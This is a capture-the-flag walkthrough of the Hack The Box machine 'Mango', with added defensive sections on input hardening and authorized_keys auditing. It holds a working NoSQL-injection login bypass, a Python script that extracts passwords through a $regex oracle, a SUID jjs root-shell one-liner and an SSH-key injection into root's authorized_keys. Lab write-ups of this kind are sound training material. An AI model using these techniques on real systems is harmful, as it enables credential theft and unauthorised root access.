Quick Summary
→ Another awesome machine: "Mango" is a medium-difficulty box that is vulnerable to a NoSQL injection attack. I was stuck on the main page and the analytics page for an hour until I realized they were only a rabbit hole. There was a login page at staging-order.mango.htb that showed up in my Nmap scan. From the forum I found out that the web app uses MongoDB; when you search Google for "Mango db" you find it is a database program, classified as a NoSQL database. Using a payload from PayloadAllTheThings I managed to bypass the login page, but once in I was redirected to an "Under Plantation" page that was another rabbit hole. That is okay, because by then I had the idea that the machine is vulnerable to a NoSQL injection attack. With my Python script I extracted the credentials for the users mango and admin, logged in to the machine via SSH and got user.txt.
In the privilege escalation part there was a vulnerable piece of software installed, jjs: a Java command-line tool used to invoke the Nashorn engine. You can use it to interpret one or several script files, or to run an interactive shell. I abused the vulnerability to read root.txt, and also injected my own SSH key, logged in to the machine and got the administrator shell.
Penetration Testing Methodologies
Network Scanning
→ Nmap scan
→ Discover open ports and what services are running
Enumeration
→ Browsing the HTTP service
→ Exploring the Analytics page
→ Check the SSL certificate of the web app
Post - Exploitation
→ Trying to bypass the login page at staging-order.mango.htb
→ With this payload from PayloadAllTheThings - NoSQL Injection Attack I managed to bypass the login
Exploitation
→ Brute-force the credentials of the users mango & admin using a Python script
→ After a few minutes I finally got both creds; log in with SSH and get user.txt
Privilege Escalation
→ Execute LinEnum.sh to see what we can do on the machine
→ Look at what permissions the user admin is allowed
→ Found the vulnerable software – jjs
→ With help from GTFObins - jjs I can execute the File read command to get root.txt
→ I can also inject SSH keys with the File write command
→ Log in with my generated SSH keys and become the administrator.
Network Scanning
Walkthrough
→ I always begin with Nmap to look at which services are running. I always use:
- -sV ⇒ Probe open ports to determine service/version info
- -sC ⇒ equivalent to --script=default
- -T<0-5> ⇒ Set timing template (higher is faster, less accurate)
- -A ⇒ Aggressive scan
- -oN ⇒ save the scan results to a text file
# bash
nmap -sV -sC -A -T4 10.10.10.162 -oN nmap-Mango

root in htb/boxes/Mango ❯ nmap -sV -sC -A 10.10.10.162 -oN nmap-Mango
Starting Nmap 7.80 ( https://nmap.org ) at 2020-04-19 05:31 PST
Nmap scan report for 10.10.10.162
Host is up (0.21s latency).
Not shown: 997 closed ports
PORT    STATE SERVICE  VERSION
22/tcp  open  ssh      OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
|   2048 a8:8f:d9:6f:a6:e4:ee:56:e3:ef:54:54:6d:56:0c:f5 (RSA)
|   256 6a:1c:ba:89:1e:b0:57:2f:fe:63:e1:61:72:89:b4:cf (ECDSA)
|_  256 90:70:fb:6f:38:ae:dc:3b:0b:31:68:64:b0:4e:7d:c9 (ED25519)
80/tcp  open  http     Apache httpd 2.4.29 ((Ubuntu))
|_http-server-header: Apache/2.4.29 (Ubuntu)
|_http-title: 403 Forbidden
443/tcp open  ssl/http Apache httpd 2.4.29 ((Ubuntu))
|_http-server-header: Apache/2.4.29 (Ubuntu)
|_http-title: Mango | Search Base
| ssl-cert: Subject: commonName=staging-order.mango.htb/organizationName=Mango Prv Ltd./stateOrProvinceName=None/countryName=IN
| Not valid before: 2019-09-27T14:21:19
|_Not valid after:  2020-09-26T14:21:19
|_ssl-date: TLS randomness does not represent time
| tls-alpn:
|_  http/1.1
No exact OS matches for host (If you know what OS is running on it, see https://nmap.org/submit/ ).
TCP/IP fingerprint:
OS:SCAN(V=7.80%E=4%D=4/19%OT=22%CT=1%CU=30519%PV=Y%DS=2%DC=T%G=Y%TM=5E9B71D
OS:5%P=x86_64-pc-linux-gnu)SEQ(SP=102%GCD=1%ISR=109%TI=Z%CI=Z%II=I%TS=A)OPS
OS:(O1=M54DST11NW7%O2=M54DST11NW7%O3=M54DNNT11NW7%O4=M54DST11NW7%O5=M54DST1
OS:1NW7%O6=M54DST11)WIN(W1=7120%W2=7120%W3=7120%W4=7120%W5=7120%W6=7120)ECN
OS:(R=Y%DF=Y%T=40%W=7210%O=M54DNNSNW7%CC=Y%Q=)T1(R=Y%DF=Y%T=40%S=O%A=S+%F=A
OS:S%RD=0%Q=)T2(R=N)T3(R=N)T4(R=Y%DF=Y%T=40%W=0%S=A%A=Z%F=R%O=%RD=0%Q=)T5(R
OS:=Y%DF=Y%T=40%W=0%S=Z%A=S+%F=AR%O=%RD=0%Q=)T6(R=Y%DF=Y%T=40%W=0%S=A%A=Z%F
OS:=R%O=%RD=0%Q=)T7(R=Y%DF=Y%T=40%W=0%S=Z%A=S+%F=AR%O=%RD=0%Q=)U1(R=Y%DF=N%
OS:T=40%IPL=164%UN=0%RIPL=G%RID=G%RIPCK=G%RUCK=G%RUD=G)IE(R=Y%DFI=N%T=40%CD
OS:=S)

Network Distance: 2 hops
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

TRACEROUTE (using port 8888/tcp)
HOP RTT       ADDRESS
1   209.53 ms 10.10.14.1
2   216.74 ms 10.10.10.162

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 47.79 seconds
root in htb/boxes/Mango took 48s ❯
Nmap results
So there are three open ports:
- 22 ⇒ basically used for SSH connections
- 80 ⇒ basically running a website
- 443 ⇒ HTTPS, whose SSL certificate is issued for "staging-order.mango.htb"
I added that hostname to my /etc/hosts file.
Enumeration
Mango Website
Normally I explore the website first, because that usually gives us interesting stuff, so:
The main page looks like a Google search, right? At first I didn't realize that the main page is a hint for this machine; I will explain that later.
Next I clicked on the Analytics tab:
This page is a complete rabbit hole; I couldn't do anything with the website, so I checked the SSL certificate and it was registered to staging-order.mango.htb, so I added that to my /etc/hosts file.
After that I visited staging-order.mango.htb and it was a login page.
Post - Exploitation
Bypass Login
I mentioned that the main page looks like a Google search; I realized that was a hint about what I should do in this phase. From the forum I knew it is a database, and the name MANGO is a big hint, so I went to Google and searched for "Mango DB", which gave me MongoDB, a NoSQL database program.
So I searched for "NoSQL Injection Attack" and found this payload; I then tried to log in with some credentials and used Burp Suite to intercept the request, then modified the request body parameters based on the payload:
POST / HTTP/1.1
Host: staging-order.mango.htb
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:68.0) Gecko/20100101 Firefox/68.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://staging-order.mango.htb/index.php
Content-Type: application/x-www-form-urlencoded
Content-Length: 53
DNT: 1
Connection: close
Cookie: PHPSESSID=9rr8f4ht86hjj17q1vkrlhskfb
Upgrade-Insecure-Requests: 1

username[$ne]=payas0&password[$ne]=payas0&login=login

I modified the username & password parameters by adding [$ne] to each parameter name ($ne is MongoDB's "not equal" operator, so the query matches any account whose username and password are not "payas0"). Sending this returns HTTP/1.1 200 OK:
HTTP/1.1 200 OK
Date: Sat, 18 Apr 2020 22:22:28 GMT
Server: Apache/2.4.29 (Ubuntu)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate
Pragma: no-cache
Vary: Accept-Encoding
Content-Length: 3380
Connection: close
Content-Type: text/html; charset=UTF-8

Follow the redirection and it goes to /home.php:
GET /home.php HTTP/1.1
Host: staging-order.mango.htb
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:68.0) Gecko/20100101 Firefox/68.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://staging-order.mango.htb/index.php
DNT: 1
Connection: close
Cookie: PHPSESSID=9rr8f4ht86hjj17q1vkrlhskfb
Upgrade-Insecure-Requests: 1
Under Plantation
When I finally bypassed the login it took me to the Under Plantation page:
As you can see on the page there is a user, admin@mango.htb, so I kept that in mind.
Now that I was in I tried to brute-force the website under /home.php, but brute-forcing was not really helpful, and eventually I found that this page is a rabbit hole again. Still, I had got a user, admin, and already knew that the site was vulnerable to a NoSQL injection attack.
Exploitation
NoSQL Injection
I searched for "MongoDB - NoSQL Injection" attacks and luckily found this article, which is about extracting the admin password from the database using NoSQL injection.
So I wrote a Python script that automates the password extraction in the same way as the article. This needs patience, because the password is revealed one character at a time:
# python
import requests
import urllib3
import string

urllib3.disable_warnings()  # silence TLS warnings from verify=False

username = "mango"
password = ""
u = "http://staging-order.mango.htb"
headers = {'content-type': 'application/x-www-form-urlencoded'}

# Regex metacharacters are skipped so the $regex payload stays a valid pattern.
skip = ['*', '+', '.', '?', '|', '&', '\\']

while True:
    found = False
    for c in string.printable:
        if c in skip:
            continue
        # password[$regex]=^<known prefix><candidate>.*  -> a 302 means the prefix still matches
        payload = 'username=%s&password[$regex]=^%s.*&login=login' % (username, password + c)
        r = requests.post(u, data=payload, headers=headers, verify=False, allow_redirects=False)
        if r.status_code == 302:
            password += c
            print("Found one more char : %s" % password)
            found = True
            break
    if not found:  # no candidate extends the prefix any further: the password is complete
        print("Password for %s: %s" % (username, password))
        break
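To make clear why the [$ne] bypass and the $regex oracle above work, and what the fix looks like on the application side, here is an added example (my own model, not the box's real PHP code). It mimics how PHP's $_POST turns `username[$ne]=x` into an array, drops that array into a MongoDB-style query the way the flawed app does, and then shows the hardened login that refuses anything other than plain strings. The user records, passwords and the three-operator matcher are constructed for the example.

```python
"""
Model of the NoSQL-injection flaw behind the staging-order.mango.htb login
(added example, not the box's code). parse_php_form() reproduces PHP's bracket
parsing, vulnerable_login() passes the result straight into the query, and
hardened_login() rejects operator objects before any database call.
"""
import re
from typing import Any, Dict, List, Optional
from urllib.parse import parse_qsl

# Constructed sample collection (not the box's real data).
USERS = [
    {"username": "admin", "password": "4dm1n-sample"},
    {"username": "mango", "password": "m4ng0-sample"},
]


def parse_php_form(body: str) -> Dict[str, Any]:
    """Mimic PHP's $_POST: 'a[$ne]=1' becomes {'a': {'$ne': '1'}}."""
    out: Dict[str, Any] = {}
    for key, value in parse_qsl(body, keep_blank_values=True):
        m = re.fullmatch(r"([^\[]+)\[([^\]]*)\]", key)
        if not m:
            out[key] = value
            continue
        base, sub = m.group(1), m.group(2)
        if not isinstance(out.get(base), dict):
            out[base] = {}
        out[base][sub] = value
    return out


def operator_fields(form: Dict[str, Any]) -> List[str]:
    """Detection hook: names of fields that arrived as objects carrying $-operators."""
    return [k for k, v in form.items()
            if isinstance(v, dict) and any(str(op).startswith("$") for op in v)]


def mongo_match(doc_value: Any, cond: Any) -> bool:
    """Minimal MongoDB matching: plain equality, $ne and $regex."""
    if not isinstance(cond, dict):
        return doc_value == cond
    for op, arg in cond.items():
        if op == "$ne":
            if doc_value == arg:
                return False
        elif op == "$regex":
            if not isinstance(doc_value, str) or re.search(arg, doc_value) is None:
                return False
        else:
            raise ValueError("operator not modelled: %s" % op)
    return True


def find_one(query: Dict[str, Any]) -> Optional[Dict[str, str]]:
    for doc in USERS:
        if all(mongo_match(doc.get(k), v) for k, v in query.items()):
            return doc
    return None


def vulnerable_login(body: str) -> Optional[Dict[str, str]]:
    """The flawed pattern: $_POST values go into the query unchanged."""
    form = parse_php_form(body)
    return find_one({"username": form.get("username"), "password": form.get("password")})


def hardened_login(body: str) -> Optional[Dict[str, str]]:
    """Fix: only scalar strings reach the query. An object where a string is
    expected is an injection attempt, so it is rejected before the database call."""
    form = parse_php_form(body)
    user, pw = form.get("username"), form.get("password")
    if not isinstance(user, str) or not isinstance(pw, str):
        return None
    return find_one({"username": user, "password": pw})


if __name__ == "__main__":
    bypass = "username[$ne]=payas0&password[$ne]=payas0&login=login"
    print("vulnerable:", vulnerable_login(bypass))   # the admin record, no password known
    print("hardened:  ", hardened_login(bypass))     # None
    print("suspicious fields:", operator_fields(parse_php_form(bypass)))
    # The oracle behind the extraction script: a 302 in the real app is a match here.
    for guess in "45":
        hit = vulnerable_login("username=admin&password[$regex]=^%s.*&login=login" % guess)
        print("admin password starts with %r: %s" % (guess, hit is not None))
```

The `isinstance(..., str)` check is the whole fix; the same idea in PHP is casting the two fields with `(string)` or rejecting `is_array()` input before building the filter. `operator_fields()` is what you would log or alert on at the application or WAF layer, since legitimate form posts never contain a `$`-prefixed key.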
Get user shell
After almost 10 minutes the script finished extracting the password of the user mango.
Now log in with it over SSH; I finally have the initial shell.
root in htb/boxes/Mango via 🐍 v2.7.17 ❯ ssh mango@10.10.10.162
The authenticity of host '10.10.10.162 (10.10.10.162)' can't be established.
ECDSA key fingerprint is SHA256:AhHG3k5r1ic/7nEKLWHXoNm0m28uM9W8heddb9lCTm0.
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
Warning: Permanently added '10.10.10.162' (ECDSA) to the list of known hosts.
mango@10.10.10.162's password:
Welcome to Ubuntu 18.04.2 LTS (GNU/Linux 4.15.0-64-generic x86_64)

 * Documentation:  https://help.ubuntu.com
 * Management:     https://landscape.canonical.com
 * Support:        https://ubuntu.com/advantage

  System information as of Sat Apr 18 22:39:50 UTC 2020

  System load:  0.01              Processes:            103
  Usage of /:   25.9% of 19.56GB  Users logged in:      0
  Memory usage: 11%               IP address for ens33: 10.10.10.162
  Swap usage:   3%

 * Canonical Livepatch is available for installation.
   - Reduce system reboots and improve kernel security. Activate at:
     https://ubuntu.com/livepatch

122 packages can be updated.
18 updates are security updates.

Failed to connect to https://changelogs.ubuntu.com/meta-release-lts. Check your Internet connection or proxy settings

Last login: Sat Apr 18 21:49:56 2020 from 10.10.14.192
mango@mango:~$
I thought I could now get user.txt, until I remembered there was another user I had seen on the Under Plantation page: admin. So next I extracted that password too with my Python script; I only changed the line username="mango" to username="admin" and ran the script again.
# python
import requests
import urllib3
import string

urllib3.disable_warnings()  # silence TLS warnings from verify=False

username = "admin"
password = ""
u = "http://staging-order.mango.htb"
headers = {'content-type': 'application/x-www-form-urlencoded'}

# Regex metacharacters are skipped so the $regex payload stays a valid pattern.
skip = ['*', '+', '.', '?', '|', '&', '\\']

while True:
    found = False
    for c in string.printable:
        if c in skip:
            continue
        # password[$regex]=^<known prefix><candidate>.*  -> a 302 means the prefix still matches
        payload = 'username=%s&password[$regex]=^%s.*&login=login' % (username, password + c)
        r = requests.post(u, data=payload, headers=headers, verify=False, allow_redirects=False)
        if r.status_code == 302:
            password += c
            print("Found one more char : %s" % password)
            found = True
            break
    if not found:  # no candidate extends the prefix any further: the password is complete
        print("Password for %s: %s" % (username, password))
        break
After 10 minutes the admin password was complete.
Now, from the mango shell, I just switched user and finally got user.txt:
mango@mango:~$ su admin
Password:
$ id
uid=4000000000(admin) gid=1001(admin) groups=1001(admin)
$ ls
exploit.sh  leon.sh
$ /bin/bash -i
To run a command as administrator (user "root"), use "sudo <command>".
See "man sudo_root" for details.

admin@mango:/home/mango$ cd ..
admin@mango:/home$ ls
admin  mango
admin@mango:/home$ cd admin
admin@mango:/home/admin$ ls
user.txt
admin@mango:/home/admin$ cat user.txt
79bf3[---------------------]47e92
admin@mango:/home/admin$
Privilege Escalation
JJS Exploitation
For the privilege escalation phase I used LinEnum.sh to look for anything I could use to get the administrator (root) shell.
So from my Kali Linux machine I transferred LinEnum to the target and executed it.
As always it shows the basic information of the machine.
# bash
admin@mango:/tmp$ bash LinEnum.sh

#########################################################
# Local Linux Enumeration & Privilege Escalation Script #
#########################################################
# www.rebootuser.com
# version 0.982

[-] Debug Info
[+] Thorough tests = Disabled

Scan started at:
Sat Apr 18 22:52:10 UTC 2020

### SYSTEM ##############################################
[-] Kernel information:
Linux mango 4.15.0-64-generic #73-Ubuntu SMP Thu Sep 12 13:16:13 UTC 2019 x86_64 x86_64 x86_64 GNU/Linux

[-] Kernel information (continued):
Linux version 4.15.0-64-generic (buildd@lgw01-amd64-038) (gcc version 7.4.0 (Ubuntu 7.4.0-1ubuntu1~18.04.1)) #73-Ubuntu SMP Thu Sep 12 13:16:13 UTC 2019

[-] Specific release information:
DISTRIB_ID=Ubuntu
DISTRIB_RELEASE=18.04
DISTRIB_CODENAME=bionic
DISTRIB_DESCRIPTION="Ubuntu 18.04.2 LTS"
NAME="Ubuntu"
VERSION="18.04.2 LTS (Bionic Beaver)"
ID=ubuntu
ID_LIKE=debian
PRETTY_NAME="Ubuntu 18.04.2 LTS"
VERSION_ID="18.04"
HOME_URL="https://www.ubuntu.com/"
SUPPORT_URL="https://help.ubuntu.com/"
BUG_REPORT_URL="https://bugs.launchpad.net/ubuntu/"
PRIVACY_POLICY_URL="https://www.ubuntu.com/legal/terms-and-policies/privacy-policy"
VERSION_CODENAME=bionic
UBUNTU_CODENAME=bionic

[-] Hostname:
mango

### USER/GROUP ##########################################
[-] Current user/group info:
uid=4000000000(admin) gid=1001(admin) groups=1001(admin)

[-] Users that have previously logged onto the system:
Username         Port     From             Latest
root             pts/1    10.10.14.247     Sat Apr 18 21:13:13 +0000 2020
mango            pts/0    10.10.15.230     Sat Apr 18 22:39:51 +0000 2020

[-] Who else is logged on:
 22:52:10 up  1:41,  1 user,  load average: 0.01, 0.02, 0.00
USER     TTY      FROM             LOGIN@   IDLE   JCPU   PCPU WHAT
mango    pts/0    10.10.15.230     22:39    2.00s  2.52s  0.01s sshd: mango [priv]
Going deeper into the recon I saw something interesting: JJS is installed, and it is SUID.
# bash
[+] Possibly interesting SUID files:
-rwsr-sr-- 1 root admin 10352 Jul 18  2019 /usr/lib/jvm/java-11-openjdk-amd64/bin/jjs

As you can see, jjs is owned by root (setuid and setgid, and executable by the admin group). After the script finished running I also checked the other SUID binaries:
admin@mango:/home/mango$ find / -perm -4000 -user root 2>/dev/null
/bin/fusermount
/bin/mount
/bin/umount
/bin/su
/bin/ping
/snap/core/7713/bin/mount
/snap/core/7713/bin/ping
/snap/core/7713/bin/ping6
/snap/core/7713/bin/su
/snap/core/7713/bin/umount
/snap/core/7713/usr/bin/chfn
/snap/core/7713/usr/bin/chsh
/snap/core/7713/usr/bin/gpasswd
/snap/core/7713/usr/bin/newgrp
/snap/core/7713/usr/bin/passwd
/snap/core/7713/usr/bin/sudo
/snap/core/7713/usr/lib/dbus-1.0/dbus-daemon-launch-helper
/snap/core/7713/usr/lib/openssh/ssh-keysign
/snap/core/7713/usr/lib/snapd/snap-confine
/snap/core/7713/usr/sbin/pppd
/snap/core/6350/bin/mount
/snap/core/6350/bin/ping
/snap/core/6350/bin/ping6
/snap/core/6350/bin/su
/snap/core/6350/bin/umount
/snap/core/6350/usr/bin/chfn
/snap/core/6350/usr/bin/chsh
/snap/core/6350/usr/bin/gpasswd
/snap/core/6350/usr/bin/newgrp
/snap/core/6350/usr/bin/passwd
/snap/core/6350/usr/bin/sudo
/snap/core/6350/usr/lib/dbus-1.0/dbus-daemon-launch-helper
/snap/core/6350/usr/lib/openssh/ssh-keysign
/snap/core/6350/usr/lib/snapd/snap-confine
/snap/core/6350/usr/sbin/pppd
/usr/bin/newuidmap
/usr/bin/newgrp
/usr/bin/gpasswd
/usr/bin/passwd
/usr/bin/newgidmap
/usr/bin/run-mailcap
/usr/bin/chfn
/usr/bin/chsh
/usr/bin/sudo
/usr/bin/traceroute6.iputils
/usr/bin/pkexec
/usr/lib/dbus-1.0/dbus-daemon-launch-helper
/usr/lib/x86_64-linux-gnu/lxc/lxc-user-nic
/usr/lib/policykit-1/polkit-agent-helper-1
/usr/lib/eject/dmcrypt-get-device
/usr/lib/jvm/java-11-openjdk-amd64/bin/jjs
/usr/lib/openssh/ssh-keysign
/usr/lib/snapd/snap-confine
admin@mango:/home/mango$
Get the root.txt
I got a hint from the forum that the privilege escalation part is #GTFObins, so I went to the website and checked JJS:
According to #GTFObins, we are able to spawn an interactive shell with elevated permissions. I used the File read technique to grab root.txt from the /root/ directory, and yes, I'm allowed to read it.
# java
admin@mango:/home/admin$ jjs
Warning: The jjs tool is planned to be removed from a future JDK release
jjs> var BufferedReader = Java.type("java.io.BufferedReader"); var FileReader = Java.type("java.io.FileReader"); var br = new BufferedReader(new FileReader("/root/root.txt")); while ((line = br.readLine()) != null) { print(line); }
8a8ef[---------------------]9ab15
jjs> exit()
admin@mango:/home/admin$

I also tried the SUID technique; when I executed it my terminal session hung, but I got the administrator shell.
# java
admin@mango:/home/mango$ echo "Java.type('java.lang.Runtime').getRuntime().exec('/bin/sh -pc \$@|sh\${IFS}-p _ echo sh -p <$(tty) >$(tty) 2>$(tty)').waitFor()" | jjs
Warning: The jjs tool is planned to be removed from a future JDK release
jjs> Java.type('java.lang.Runtime').getRuntime().exec('/bin/sh -pc $@|sh${IFS}-p _ echo sh -p </dev/pts/1 >/dev/pts/1 2>/dev/pts/1').waitFor()
#
Administrator Shell
I was not satisfied with what I had done, because I wanted a proper root shell and to grab root.txt again. I had only one option remaining: the File write function.
So my idea was to inject an SSH key into the /root/.ssh/ directory and log in as root with my RSA key. First I generated my SSH keys with the command 'ssh-keygen -t rsa', then copied id_rsa.pub and echoed it into a file in the /tmp directory:
admin@mango:/home/mango$ echo "ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABgQDrIFVL39sxNcAJY5yNM2XxpZtDIeZXI3/HrPW465dJPzS8QqnytUf8pYR2cg9tk3E5CV4XjaYn3MxwDuQ3b5NWjvnqS/8KOCyM1FKQAON/zE055LmxUsv4XysN6bD5HK/wtykAdHCOTvnN2PSQjUMCLe7RDep4Y37KvJdiyN1BnoccHqFo+7BV2PnuBk5rs5o1cG13Knex5hTQhbgXvARqy8nGLeJGjrryl2xsKdyBYeKzBsLLKIEj12LVWBk4zkedDLdcSBMMaioowjB53b+m0/Rel0DT35MLxK1evJL5O2QSQE4qicRKt+verPogttcwq8zWn21orFasRN65kjWM8LKzdgqt8XpGEZ6L/ATZr4rhgu2eduGOuWwMWob6MttdT7X4qAZsfrMdTKuVdJa217dq4U72CJ3a6Re0CQrRxS7eoQHWcYvYIewWbHq/ro+xsyTR7gMDmW82UoE0TZV3/b9WXWgjdQvnVVQ8rxJHVegZAUCFq8LwwBq/Alh6gys= root@Payas0" > /tmp/ssh
And now overwrite root's authorized_keys file:
admin@mango:/home/mango$ echo "Java.type('java.lang.Runtime').getRuntime().exec('cp /tmp/ssh /root/.ssh/authorized_keys').waitFor()" | jjs
Warning: The jjs tool is planned to be removed from a future JDK release
jjs> Java.type('java.lang.Runtime').getRuntime().exec('cp /tmp/ssh /root/.ssh/authorized_keys').waitFor()
0
jjs> admin@mango:/home/mango$

Now that everything is set up, I log in as root, finally get the last shell and grab root.txt again:
root in htb/boxes/Mango via 🐍 v2.7.17 ❯ ssh -i /root/.ssh/id_rsa root@10.10.10.162
Welcome to Ubuntu 18.04.2 LTS (GNU/Linux 4.15.0-64-generic x86_64)

 * Documentation:  https://help.ubuntu.com
 * Management:     https://landscape.canonical.com
 * Support:        https://ubuntu.com/advantage

  System information as of Sat Apr 18 23:40:32 UTC 2020

  System load:  0.04              Processes:            114
  Usage of /:   25.8% of 19.56GB  Users logged in:      1
  Memory usage: 11%               IP address for ens33: 10.10.10.162
  Swap usage:   4%

 * Kata Containers are now fully integrated in Charmed Kubernetes 1.16!
   Yes, charms take the Krazy out of K8s Kata Kluster Konstruction.

     https://ubuntu.com/kubernetes/docs/release-notes

 * Canonical Livepatch is available for installation.
   - Reduce system reboots and improve kernel security. Activate at:
     https://ubuntu.com/livepatch

122 packages can be updated.
18 updates are security updates.

Failed to connect to https://changelogs.ubuntu.com/meta-release-lts. Check your Internet connection or proxy settings

Last login: Sat Apr 18 23:25:35 2020 from 10.10.14.43
root@mango:~# id
uid=0(root) gid=0(root) groups=0(root)
root@mango:~# ls
root.txt
root@mango:~# cat root.txt
8a8ef[---------------------]9ab15
root@mango:~#
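The persistence step above leaves a single trace on disk: a new line in /root/.ssh/authorized_keys. As an added example (my own script, not from the writeup), here is the check an incident responder would run over that file. It parses each entry (optional options field, key type, base64 blob, comment), verifies that the blob actually encodes the declared key type, computes the same SHA256 fingerprint that `ssh-keygen -lf` prints, and reports every key whose fingerprint is not on an allowlist. The sample file, the allowlist and the Ed25519 key bytes are constructed for the example; the injected entry reuses the "root@Payas0" comment from the key above only as a label.

```python
"""
authorized_keys audit (added example, not part of the writeup).
"""
import base64
import hashlib
import struct
from typing import Dict, List, Set

KEY_TYPES = {"ssh-rsa", "ssh-ed25519", "ecdsa-sha2-nistp256",
             "ecdsa-sha2-nistp384", "ecdsa-sha2-nistp521"}


def ed25519_blob(pubkey: bytes) -> str:
    """Wire-format blob for a 32-byte Ed25519 public key (string type, string key)."""
    t = b"ssh-ed25519"
    raw = struct.pack(">I", len(t)) + t + struct.pack(">I", len(pubkey)) + pubkey
    return base64.b64encode(raw).decode()


# Constructed sample authorized_keys: two expected keys and one injected one (line 4).
SAMPLE_AUTHORIZED_KEYS = "\n".join([
    "# backup operator",
    "ssh-ed25519 " + ed25519_blob(bytes(range(32))) + " backup@ops",
    'command="/usr/bin/rrsync /srv",no-pty ssh-ed25519 ' + ed25519_blob(bytes(32)) + " rsync@ops",
    "ssh-ed25519 " + ed25519_blob(b"\x7f" * 32) + " root@Payas0",
])


def fingerprint(blob_b64: str) -> str:
    """Same value `ssh-keygen -lf` prints: base64(sha256(blob)) without padding."""
    digest = hashlib.sha256(base64.b64decode(blob_b64)).digest()
    return "SHA256:" + base64.b64encode(digest).decode().rstrip("=")


def blob_type(blob_b64: str) -> str:
    """Key type string embedded at the start of the blob."""
    raw = base64.b64decode(blob_b64)
    (n,) = struct.unpack(">I", raw[:4])
    return raw[4:4 + n].decode("ascii", errors="replace")


def parse_authorized_keys(text: str) -> List[Dict[str, object]]:
    entries = []
    for lineno, line in enumerate(text.splitlines(), 1):
        line = line.strip()
        if not line or line.startswith("#"):
            continue
        fields = line.split()
        # An options field (which may itself contain spaces inside quotes) can
        # precede the key type, so locate the key-type token first.
        idx = next((i for i, f in enumerate(fields) if f in KEY_TYPES), None)
        if idx is None or idx + 1 >= len(fields):
            entries.append({"line": lineno, "error": "unparseable entry"})
            continue
        entries.append({
            "line": lineno,
            "options": " ".join(fields[:idx]),
            "type": fields[idx],
            "blob": fields[idx + 1],
            "comment": " ".join(fields[idx + 2:]),
        })
    return entries


def audit_authorized_keys(text: str, allowed: Set[str]) -> List[Dict[str, object]]:
    """One finding per entry that is malformed, mistyped or not on the allowlist."""
    findings = []
    for e in parse_authorized_keys(text):
        if "error" in e:
            findings.append({"line": e["line"], "issue": e["error"]})
            continue
        try:
            embedded, fp = blob_type(e["blob"]), fingerprint(e["blob"])
        except (ValueError, struct.error):
            findings.append({"line": e["line"], "issue": "blob is not a valid key blob"})
            continue
        if embedded != e["type"]:
            findings.append({"line": e["line"],
                             "issue": "blob type %r differs from declared %r" % (embedded, e["type"])})
        if fp not in allowed:
            findings.append({"line": e["line"], "issue": "fingerprint not on allowlist",
                             "fingerprint": fp, "comment": e["comment"], "options": e["options"]})
    return findings


# Allowlist: fingerprints of the two keys that are supposed to be there (constructed).
ALLOWED = {fingerprint(ed25519_blob(bytes(range(32)))), fingerprint(ed25519_blob(bytes(32)))}


def demo() -> List[Dict[str, object]]:
    return audit_authorized_keys(SAMPLE_AUTHORIZED_KEYS, ALLOWED)


if __name__ == "__main__":
    import sys
    text = open(sys.argv[1]).read() if len(sys.argv) > 1 else SAMPLE_AUTHORIZED_KEYS
    for finding in audit_authorized_keys(text, ALLOWED):
        print(finding)
```

Pointed at a real file (`python3 keys_audit.py /root/.ssh/authorized_keys`) with a fingerprint allowlist from your key inventory, the single finding it returns for the sample is the injected line, identified by fingerprint rather than by the comment, which an attacker controls. The type check catches hand-edited entries whose blob and declared type disagree; OpenSSH would reject those, but their presence still tells you someone wrote to the file.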
If you liked my writeup please leave a respect on my Profile.
References:
Extracting MongoDB password with NoSQL Injection
NoSQL Injection
Java gives a shell for everything
#GTFObins - JJS